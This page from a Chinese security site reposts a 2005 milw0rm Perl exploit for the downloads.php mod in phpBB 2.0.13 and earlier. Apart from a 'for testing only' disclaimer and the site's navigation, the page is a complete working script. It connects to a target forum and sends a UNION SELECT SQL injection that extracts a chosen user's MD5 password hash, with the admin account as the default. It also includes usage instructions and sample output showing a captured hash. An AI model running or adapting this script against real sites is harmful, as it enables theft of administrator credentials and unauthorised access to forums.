| 网站首页 | 新闻中心 | 系统安全 | 网络安全 | 安全技术 | 下载中心 | 
课件制作网.
收藏本站
设为首页
安全365
phpBB = 2.0.13 downloads.php mod Remote Exploit
phpBB = 2.0.13 downloads.php mod Remote Exploit
作者:佚名 文章来源:不详 点击数: 更新时间:2007-1-25 10:57:43 
以下代码仅供测试,请勿用于非法用途。
#!/usr/bin/perl -w

use IO::Socket;



##    Example:

##    C:/>phpbb.pl www.site.com /phpBB2/ 2

##

##     downloads.php mod in phpBB <= 2.0.13

##     **********************************

##      [~] Connecting...

##      [+] Connected!

##      [~] Sending Data...

##      [~] Data Sent, Waiting for response...

##      [+] MD5 Hash for user with id=2 is: 81dc9bdb52d04dc20036dbd8313ed055

##

if (@ARGV < 3)

{

print "/n/n";

print "|****************************************************************|/n";

print " phpBB <=2.0.13 'downloads.php' Mod/n";

print " Bug found by Axl And CereBrums/n";

print " Coded by CereBrums // 2/4/2005/n";

print " Usage: phpbb.pl <site> <folder> <user_id>/n";

print " e.g.: phpbb.pl www.site.com /phpBB2/ 2 /n";

print " [~] <server> - site address/n";

print " [~] <folder> - forum folder/n";

print " [~] <user_id> - user id (2 default for phpBB admin)/n";

print "|****************************************************************|/n";

print "/n/n";

exit(1);

}



$take = 0;

$success = 0;

$server = $ARGV[0];

$folder = $ARGV[1];

$user_id = $ARGV[2];

print "/n downloads.php mod in phpBB <= 2.0.13/n";

print " **********************************/n";

print "  [~] Connecting.../n";

$socket = IO::Socket::INET->new(

Proto => "tcp",

PeerAddr => "$server",

PeerPort => "80") || die "$socket error $!";



print "  [+] Connected/n";

print "  [~] Sending Data.../n";



$path = "http://$server/";

$path .= "/$folder/";

$path .= "downloads.php?cat=-1%20UNION%20SELECT%200,user_password,0,0,0,0,0,0,0%20FROM%20phpbb_users%20WHERE%20user_id=$user_id/*";

print $socket "GET $path HTTP/1.0/r/n/r/n";



print "  [~] Data Sent, Waiting for response.../n";



while ($answer = <$socket>)

{

       if ($take == 1) {

               $pass = substr($answer,51,32);

               print "  [+] MD5 Hash for user with id=$user_id is: $pass/n";

               $success = 1;

               $take = 0;

       }

       $found = rindex ($answer,"downloads.php?view=detail&id=0&cat=0");

       if ( $found > -1 ) {

               $take = 1;

       }

}

if ($success==0) {print "  [-] Exploit failed/n";}



## EOF ##
# milw0rm.com [2005-04-02] 【转自世纪安全网 http://www.21safe.com】
文章录入:admin    责任编辑:admin 
  • 上一篇文章:

  • 下一篇文章:
    • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
      网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
     
     
     
    PHP html_entity_decode
    PHP HTMLEntities和HTML
    PHP wordwrap()缓冲区溢
    phpMyAdmin多个HTTP响应
    PHP session.save_path(
    WordPress functions.ph
    PHP Easy Download file
    PHP HTMLEntities和HTML
    WordPress functions.ph
    PHP Easy Download file

    Copyright © 2006-2008 www.anquan365.com 安全365
    建议使用1024*768分辨率及第三方浏览器对本站进行浏览